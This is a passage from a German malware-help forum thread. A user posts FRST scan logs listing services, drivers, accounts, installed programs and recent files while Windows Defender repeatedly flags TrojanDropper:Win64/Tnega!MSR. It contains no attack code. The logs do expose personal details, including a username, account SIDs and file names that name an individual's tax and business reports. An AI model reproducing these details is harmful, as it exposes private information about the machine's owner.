CHR Extension: (YouTube) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-11-09]
CHR Extension: (Tabellen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-11-09]
CHR Extension: (Google Docs Offline) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-09]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-11-09]
CHR Extension: (Google Mail) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-09]
CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-09]
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-07]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [105240 2017-10-12] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-05-20] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)
R2 DATEV Sicherheitspaket-Basis-Dienst; C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe [408592 2020-10-20] (DATEV eG 08 2 -> DATEV eG)
S3 FBIOSDRVService; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\fbiosdrv-service.exe [130200 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R2 Fuj02e3DriverUtilityService; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe [177432 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R2 iked; C:\Program Files\ShrewSoft\VPN Client\iked.exe [1127736 2013-07-01] (Shrew Soft Inc -> )
R2 ipsecd; C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe [810808 2013-07-01] (Shrew Soft Inc -> )
R3 lmhosts; C:\WINDOWS\System32\svchost.exe [57360 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R3 lmhosts; C:\WINDOWS\SysWOW64\svchost.exe [47016 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NlaSvc; C:\WINDOWS\System32\svchost.exe [57360 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NlaSvc; C:\WINDOWS\SysWOW64\svchost.exe [47016 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 nsi; C:\WINDOWS\system32\svchost.exe [57360 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 nsi; C:\WINDOWS\SysWOW64\svchost.exe [47016 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12720144 2020-11-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 dlcdcncm; C:\WINDOWS\System32\drivers\dlcdcncm62_x64.sys [92400 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)
S3 dlusbaudio; C:\WINDOWS\system32\DRIVERS\dlusbaudio_x64.sys [238320 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)
R3 FBIOSDRV; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\FBIOSDRV.sys [43672 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R3 fuj02e3; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3.sys [59672 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R3 GabiAcpi; C:\WINDOWS\System32\drivers\GabiAcpi.sys [40488 2020-07-15] (FUJITSU CLIENT COMPUTING LIMITED -> Fujitsu Technology Solutions)
U5 KOBCCID; C:\Windows\System32\Drivers\KOBCCID.sys [116864 2019-01-16] (KOBIL Systems GmbH) [Datei ist nicht signiert]
S3 KobilCcid; C:\WINDOWS\System32\drivers\KobilCcid_x64.sys [50432 2019-10-21] (KOBIL Systems GmbH -> KOBIL Systems GmbH)
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2020-05-06] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S4 usbrndis6; C:\WINDOWS\System32\drivers\usb80236.sys [24064 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]
R1 vflt; C:\WINDOWS\system32\DRIVERS\vfilter.sys [24064 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)
S3 vnet; C:\WINDOWS\System32\drivers\virtualnet.sys [17408 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
S3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-09 18:10 - 2021-01-09 18:11 - 000021700 _____ C:\Users\buskr5\Downloads\FRST.txt
2021-01-09 18:10 - 2021-01-09 18:10 - 002281472 _____ (Farbar) C:\Users\buskr5\Downloads\FRST64.exe
2021-01-09 15:44 - 2021-01-09 15:44 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2021-01-09 15:05 - 2021-01-09 18:11 - 000000000 ____D C:\FRST
2021-01-07 19:12 - 2021-01-07 19:12 - 000024546 _____ C:\Users\buskr5\Documents\bookmarks_07.01.21.html
2021-01-07 19:11 - 2021-01-07 19:11 - 000048978 _____ C:\Users\buskr5\Documents\cc_20210107_191149.reg
2021-01-07 19:09 - 2021-01-07 19:10 - 000000000 ____D C:\Users\buskr5\Downloads\ccsetup575
2021-01-07 18:52 - 2021-01-07 18:59 - 000000000 ____D C:\AdwCleaner
2021-01-05 09:49 - 2021-01-05 09:49 - 000012437 _____ C:\Users\buskr5\Downloads\Werkdienstwohnung-Werkmietwohnung.pdf
2020-12-21 10:10 - 2020-12-21 10:10 - 000345367 _____ C:\Users\buskr5\Downloads\LRA-WM_ZS_Was_braucht_man_wann_zur_Zulassung_10-2019.pdf
2020-12-21 10:10 - 2020-12-21 10:10 - 000013851 _____ C:\Users\buskr5\Downloads\Erklärung_an_Eides_Statt.pdf
2020-12-21 10:09 - 2020-12-21 10:09 - 000280628 _____ C:\Users\buskr5\Downloads\SEPA_Kombimandat.pdf
2020-12-21 10:04 - 2020-12-21 10:04 - 000020116 _____ C:\Users\buskr5\Downloads\Vollmacht (1).pdf
2020-12-17 08:20 - 2020-12-17 08:20 - 000000000 ____D C:\Users\buskr5\Documents\Lea Schule
2020-12-14 12:10 - 2020-12-14 12:10 - 000196173 _____ C:\Users\buskr5\Desktop\untermietvertrag-mustervorlage-word-pdf.pdf
2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner (3)
2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Isi
2020-12-10 08:55 - 2020-12-10 08:55 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019 (1).pdf
2020-12-10 08:50 - 2020-12-10 08:50 - 000336734 _____ C:\Users\buskr5\Downloads\ESt Krieger, Roland 2019.pdf
2020-12-10 08:47 - 2020-12-10 08:47 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019.pdf
2020-12-10 08:47 - 2020-12-10 08:47 - 000199415 _____ C:\Users\buskr5\Downloads\Krieger Steuerbericht 2019.pdf
2020-12-10 08:45 - 2020-12-10 08:45 - 000140074 _____ C:\Users\buskr5\Downloads\GewSt Krieger Roland 2019.pdf

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-09 17:55 - 2020-07-16 07:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-09 17:55 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-09 16:01 - 2018-12-18 08:26 - 000002350 _____ C:\Users\buskr5\Desktop\INCOGNITO.lnk
2021-01-09 15:48 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\ConnectedDevicesPlatform
2021-01-09 15:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-09 15:46 - 2018-12-17 10:52 - 000000000 __SHD C:\Users\buskr5\IntelGraphicsProfiles
2021-01-09 15:44 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-09 15:44 - 2018-12-19 10:28 - 000000000 ____D C:\Program Files (x86)\InstallShield Installation Information
2021-01-09 15:36 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-09 15:18 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 __RHD C:\Users\Public\AccountPictures
2021-01-09 15:01 - 2020-06-16 05:58 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 17:24 - 2020-07-16 08:03 - 001632020 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-07 17:24 - 2019-12-07 15:51 - 000707136 _____ C:\WINDOWS\system32\perfh007.dat
2021-01-07 17:24 - 2019-12-07 15:51 - 000142394 _____ C:\WINDOWS\system32\perfc007.dat
2021-01-07 17:17 - 2020-12-07 10:38 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-07 17:17 - 2020-07-16 08:02 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-07 17:17 - 2020-07-16 07:55 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-07 17:17 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2021-01-07 07:23 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\Packages
2021-01-07 07:21 - 2018-12-17 17:20 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-05 12:52 - 2018-12-20 11:36 - 000002248 ____H C:\Users\buskr5\Documents\Default.rdp
2021-01-05 12:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp
2021-01-05 12:04 - 2019-04-30 07:26 - 000031577 _____ C:\Users\buskr5\Desktop\Monatliche Abzüge.xlsx
2020-12-28 09:55 - 2019-11-12 09:00 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner
2020-12-27 10:42 - 2018-12-17 10:24 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-12-17 12:50 - 2020-07-15 21:58 - 000002386 _____ C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-12-17 12:50 - 2018-12-17 10:54 - 000000000 ___RD C:\Users\buskr5\OneDrive
2020-12-16 11:01 - 2018-12-17 10:54 - 000000000 ____D C:\Users\buskr5\AppData\Local\PlaceholderTileLogoFolder
2020-12-14 08:49 - 2018-12-17 11:06 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-10 09:12 - 2019-09-16 11:29 - 000000000 ___RD C:\Users\buskr5\Desktop\Schulkinder

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2019-01-16 11:54 - 2019-01-16 11:54 - 000000463 _____ () C:\Users\buskr5\AppData\Local\belegtransfer_setup.log

==================== FLock ==============================

2019-12-07 10:14 C:\PerfLogs
2020-07-16 07:56 C:\Recovery
2020-12-20 09:26 C:\WINDOWS\system32\config
2019-12-07 10:31 C:\WINDOWS\system32\Configuration
2019-12-07 10:14 C:\WINDOWS\system32\DriverState
2021-01-05 12:41 C:\WINDOWS\system32\FxsTmp
2019-12-07 10:14 C:\WINDOWS\system32\ias
2020-07-16 07:55 C:\WINDOWS\system32\MsDtc
2019-12-07 10:14 C:\WINDOWS\system32\networklist
2021-01-09 17:55 C:\WINDOWS\system32\SleepStudy
2021-01-09 18:05 C:\WINDOWS\system32\sru
2021-01-09 15:04 C:\WINDOWS\system32\Tasks
2020-07-16 07:55 C:\WINDOWS\system32\Tasks_Migrated
2021-01-07 17:19 C:\WINDOWS\system32\WDI
2021-01-09 15:36 C:\Program Files\WindowsApps
2020-07-16 08:02 C:\WINDOWS\diagerr.xml
2020-07-16 08:02 C:\WINDOWS\diagwrn.xml
2019-09-11 20:04 C:\WINDOWS\InfusedApps
2020-07-16 07:55 C:\WINDOWS\LiveKernelReports
2019-12-07 10:14 C:\WINDOWS\ModemLogs
2021-01-09 18:11 C:\WINDOWS\Prefetch
2021-01-07 17:17 C:\WINDOWS\ServiceState
2019-12-07 10:31 C:\WINDOWS\SysWOW64\config
2019-12-07 10:31 C:\WINDOWS\SysWOW64\Configuration
2019-12-07 15:52 C:\WINDOWS\SysWOW64\FxsTmp
2019-12-07 10:14 C:\WINDOWS\SysWOW64\Msdtc
2019-12-07 10:14 C:\WINDOWS\SysWOW64\networklist
2019-12-07 10:14 C:\WINDOWS\SysWOW64\sru
2019-12-07 10:31 C:\WINDOWS\SysWOW64\Tasks
2019-12-07 10:14 C:\WINDOWS\system32\Drivers\DriverData
2020-07-21 09:22 C:\Users\ITMueller
2020-11-09 12:47 C:\ProgramData\Packages
2019-12-07 15:54 C:\ProgramData\WindowsHolographicDevices

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)



ACHTUNG: ==> Auf den BCD konnte nicht zugegriffen werden. der Benutzer ist kein Administrator -> Der Speicher f�r die Startkonfigurationsdaten konnte nicht ge�ffnet werden.
Zugriff verweigert

==================== Ende von FRST.txt ========================
         
__________________

Alt 09.01.2021, 18:28   #4
ql-_-lp
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



So und jetzt nochmal mit Admin rechten

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von buskr5 (09-01-2021 18:22:53)
Gestartet von C:\Users\buskr5\Downloads
Windows 10 Pro Version 20H2 19042.685 (X64) (2020-07-16 07:02:22)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-4192198180-2913720414-2796424460-500 - Administrator - Disabled)
buskr5 (S-1-5-21-4192198180-2913720414-2796424460-1002 - Administrator - Enabled) => C:\Users\buskr5
DefaultAccount (S-1-5-21-4192198180-2913720414-2796424460-503 - Limited - Disabled)
Gast (S-1-5-21-4192198180-2913720414-2796424460-501 - Limited - Disabled)
ITMueller (S-1-5-21-4192198180-2913720414-2796424460-1001 - Administrator - Enabled) => C:\Users\ITMueller
WDAGUtilityAccount (S-1-5-21-4192198180-2913720414-2796424460-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 10.100.404.117 - Alps Electric)
Apple Application Support (32-Bit) (HKLM-x32\...\{9738288C-21BC-4F54-AB4F-72F059339376}) (Version: 8.6 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{DEB339C1-2687-43AB-816A-8714F3E26846}) (Version: 8.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C788AE25-3D4E-4D18-811B-3219F778487E}) (Version: 13.5.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
DATEV Belegtransfer V.3.5 (HKLM-x32\...\{EC561A24-754E-44F1-B76F-2FDA3DF9E912}) (Version: 2.03 - DATEV eG)
DisplayLink Graphics Driver (HKLM\...\{113EF6B6-57CF-41EA-9F1B-BA50345EDEA5}) (Version: 9.0.1651.0 - DisplayLink Corp.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
HP Dropbox Plugin (HKLM-x32\...\{1E18E86D-632C-48B5-962C-B60C2E53A478}) (Version: 36.0.41.58587 - HP)
HP Google Drive Plugin (HKLM-x32\...\{039DDA62-50CC-4E7F-9D54-7CF032A2D362}) (Version: 36.0.41.58587 - HP)
HP OfficeJet Pro 7740 series - Grundlegende Software für das Gerät (HKLM\...\{D2C5832A-0287-445C-845F-E53F332C8A18}) (Version: 40.12.1161.1896 - HP Inc.)
HP OfficeJet Pro 7740 series Hilfe (HKLM-x32\...\{5DA0FF5D-80F6-406A-A385-033BA7CBE6B8}) (Version: 39.0.0 - HP)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6290 - Intel Corporation)
iTunes (HKLM\...\{D63C9A58-8F6C-4765-A7B7-6F7711707F46}) (Version: 12.10.8.5 - Apple Inc.)
KOBIL CCID driver x64x86 (HKLM-x32\...\{C5CBEBFF-3DB4-4271-A706-757BBE3BD5AE}) (Version: 1.018.03071 - KOBIL Systems) Hidden
MediaHuman YouTube to MP3 Converter 3.9.9.46 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.46 - MediaHuman)
Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13426.20404 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft OneDrive (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)
Mietbus (HKLM-x32\...\ST4UNST #1) (Version:  - )
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8816.1 - Realtek Semiconductor Corp.)
Screenpresso (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Screenpresso) (Version: 1.8.4.0 - Learnpulse)
Shrew Soft VPN Client (HKLM\...\Shrew Soft VPN Client) (Version:  - )
Sicherheitspaket compact (HKLM-x32\...\{0FA40302-24BC-4235-8717-CCAB7D5A3AC2}) (Version: 6.8.102.20294 - DATEV eG) Hidden
Sicherheitspaket compact (HKLM-x32\...\{480df3d6-f2a5-4f2c-8ee3-3079eefa1c61}) (Version: 6.8.102.20294 - DATEV eG)
Sicherheitspaket compact VDST (HKLM-x32\...\{1277C975-FD21-4782-BFD3-6D7BAB7AF466}) (Version: 6.1.100.18178 - DATEV eG) Hidden
Sicherheitspaket compact x64 (HKLM\...\{FE909D88-4863-45D2-9FFB-61CB2DD592F0}) (Version: 6.8.102.20294 - DATEV eG) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.12.4 - TeamViewer)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden
Zoom (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\ZoomUMX) (Version: 5.1 - Zoom Video Communications, Inc.)

Packages:
=========
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_122.1.778.0_x64__v10z8vjag6ke6 [2021-01-09] (HP Inc.)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-06-02] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-21] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-21] (Microsoft Corporation) [MS Ad]
Phototastic Collage -> C:\Program Files\WindowsApps\ThumbmunkeysLtd.PhototasticCollage_3.23.1.0_x64__nfy108tqq3p12 [2020-11-12] (Thumbmunkeys Ltd)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxDTCM.dll [2018-11-14] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Drivers32: [vidc.spv1] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\ScreenpressoCodec.dll [167656 2021-01-09] (Learnpulse -> LearnPulse)

==================== Verknüpfungen & WMI ========================

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2013-07-01 00:17 - 2013-07-01 00:17 - 000017920 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libdtp.dll
2013-07-01 00:15 - 2013-07-01 00:15 - 000022016 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libidb.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000628224 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libike.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000116736 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libip.dll
2013-07-01 00:15 - 2013-07-01 00:15 - 000018432 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libith.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000013312 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\liblog.dll
2013-07-01 00:17 - 2013-07-01 00:17 - 000029184 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libpfk.dll
2013-07-01 00:17 - 2013-07-01 00:17 - 000035840 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvflt.dll
2013-07-01 00:16 - 2013-07-01 00:16 - 000039936 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvnet.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
BHO: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO64002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)
BHO-x32: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)
